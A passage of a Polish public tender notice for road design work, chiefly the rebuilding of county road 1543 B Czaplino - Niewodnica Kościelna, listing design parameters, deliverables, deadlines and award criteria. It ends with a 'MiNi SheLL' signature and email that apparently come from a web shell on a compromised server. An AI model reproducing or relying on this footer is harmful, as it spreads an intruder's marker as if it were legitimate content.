 a. Mapa do celów projektowych w skali 1:500                    - 1 egz.
b. Projekt budowlany				                         - 4 egz.
c. Projekt wykonawczy (techniczny) branża drogowa z częścią przedmiarową i ST- 5 egz.
d. Projekt wykonawczy (techniczny) branża sanitarna (kanalizacja deszczowa) 
    z częścią przedmiarową i ST	                                 - 5 egz.
 e. Badania geotechniczne podłoża nawierzchni		          -2 egz.
 f. Projekt stałej organizacji ruchu	   		                  - 4 egz.
 g. Pomiary ruchu i prognoza ruchu                                    - 2 egz. 
Obowiązuje wersja elektroniczna całej dokumentacji projektowej - 1 płyta
Obowiązuje przedstawienie do dnia 15.07.2015r. koncepcji w wersji elektronicznej zawierającej rozwiązania sytuacyjne, wysokościowe i konstrukcję jezdni, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę z rozbudową drogi powiatowej 
Nr 1543 B Czaplino - Niewodnica Kościelna (Gm. Choroszcz).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący (dane ewidencyjne podlegające weryfikacji przez Projektanta)
1.1.	Szerokość istniejącej jezdni i korona
Od km rob. 0+000 (koniec nawierzchni bitumicznej w m. Czaplino - od strony m. Choroszcz) do km rob. ok.1+400 (granica gminy Choroszcz).
- przekrój szlakowy,
- szer. jezdni 5,0m, korona drogi 8,0m, nawierzchnia gruntowo - żwirowa. 
1.2.	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Przewiduje się nową konstrukcję jezdni drogi.
1.3.	Sytuacja trasy
Wymaga korekt. 
1.4.	Obiekty inżynierskie
Przepusty:
-  3 przepusty, w tym:  2 żelbetowe - 1szt. ramowy 1,0mx0,8m i 1 szt. O 0,80m; 1 z rur plastikowych karbowanych.
1.5.	Niweleta drogi
Niweleta drogi wymaga korekt.
1.6.	Stan rowów i innych urządzeń odwadniających
Odwodnienie drogi wymaga:
- renowacji rowów przydrożnych,
- przebudowy przepustów pod koroną drogi z dostosowaniem do migracji małych zwierząt (dot. przepustów na ciekach),  
- budowy przepustów w obrębie skrzyżowań z drogami bocznymi,
- budowy odcinkowej kanalizacji deszczowej w m. Czaplino z wyprowadzeniem wód opadowych do rowu melioracyjnego i rowu przydrożnego,
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA - DROGA
2.1.	Wnioskowany charakter robót: przebudowa z rozbudową 
2.2.	Parametry techniczne do projektowania 
2.2.1. Prędkość projektowa Vp   -  w terenie zabudowanym - 40 lub 30 km/h 
                                                   - w terenie niezabudowanym - 50 lub 40 km/h 
2.2.2. Klasa drogi                       -   L 
2.2.3. Przekrój poprzeczny (normalny):
- w miejscowości Czaplino, na odcinku zwartej zabudowy, uliczny, szerokość jezdni 6,00m; szerokość chodników pożądana 1,5m.   
- na pozostałych odcinkach - przekrój szlakowy, szer. jezdni 6,0m,  szerokość pobocza 1,25m lub. 1,50m. 
2.3.  Konstrukcja (technologia) nawierzchni:  
2.3.1.	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2017 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.3.2	Podbudowa - kruszywowa; 
2.3.3.	Nawierzchnia - beton asfaltowy  
2.4. Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Rozwiązanie skrzyżowań z drogami gminnymi i z drogą powiatową Nr 1547 B.  Jeden zjazd do jednej działki w uzgodnionej z właścicielem lokalizacji. Zatoki autobusowe w lokalizacji uzgodnionej komisyjnie. Komisję, na wniosek wykonawcy dokumentacji, powoła Zamawiający.  Renowacja rowów wg potrzeb, przebudowa przepustów, budowa  przepustów w obrębie skrzyżowań; budowa odcinkowej kanalizacji deszczowej  z wyprowadzeniem wód opadowych do rowu melioracyjnego i rowu przydrożnego. 
2.5.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z przebudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.6.	  Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  
W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.
4.   ZAKRES OPRACOWANIA
4.1.	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych w skali 1:500. Tytuł projektu budowlanego uzgodnić z Zamawiającym.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białym-stoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
4.2. Dodatkowo należy opracować:
-  operaty wodnoprawne - przebudowa przepustów; odprowadzenie wód opadowych do ziemi  lub do wód, wyloty odcinkowej kanalizacji deszczowej,              
-  badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów wątpliwych z częstotliwością umożliwiającą opracowanie przekroi   geologicznych,
- pomiary ruchu i prognozę ruchu na 20 lat
- projekt stałej organizacji ruchu,     
 Dokumentację należy przekazać:
a. Materiały do opiniowania ze Specustawy drogowej wraz z naniesionymi na mapę projektowanymi  podziałami działek                                   - 7 egz.
b. mapa do celów projektowych w skali 1:500                    - 1 egz.
c. Projekt budowlany                                                     - 4 egz.
d. Projekt wykonawczy (techniczny) branża drogowa z częścią przedmiarową i ST                                                                             - 5 egz. 
e. Projekt wykonawczy (techniczny) przebudowa przepustów pod koroną drogi, 
z częścią przedmiarową i ST                                                        - 5 egz.
f.  Projekt wykonawczy (techniczny) branża sanitarna (odcinki kanalizacji deszczowej) z częścią przedmiarową i ST                                      - 5 egz.
g. Operaty wodnoprawne (przebudowa przepustów, odprowadzenie wód 
opadowych do ziemi lub do wód, wyloty kanalizacji deszczowej) wersja papierowa - po 3egz. + wersja elektroniczna - po 2 płytki
h. Badania geotechniczne podłoża nawierzchni                    - 2 egz. 
i. Plan wyrębu drzew i krzewów                                        - 3 egz.
j. Projekt stałej organizacji ruchu                                      - 4 egz.  
k. Pomiary ruchu i prognoza ruchu                                     - 2 egz.
Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta
Obowiązuje przedstawienie do dnia 31.07.2015r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny drogi z projektowaną niweletą, konstrukcja jezdni drogi), do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
4.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com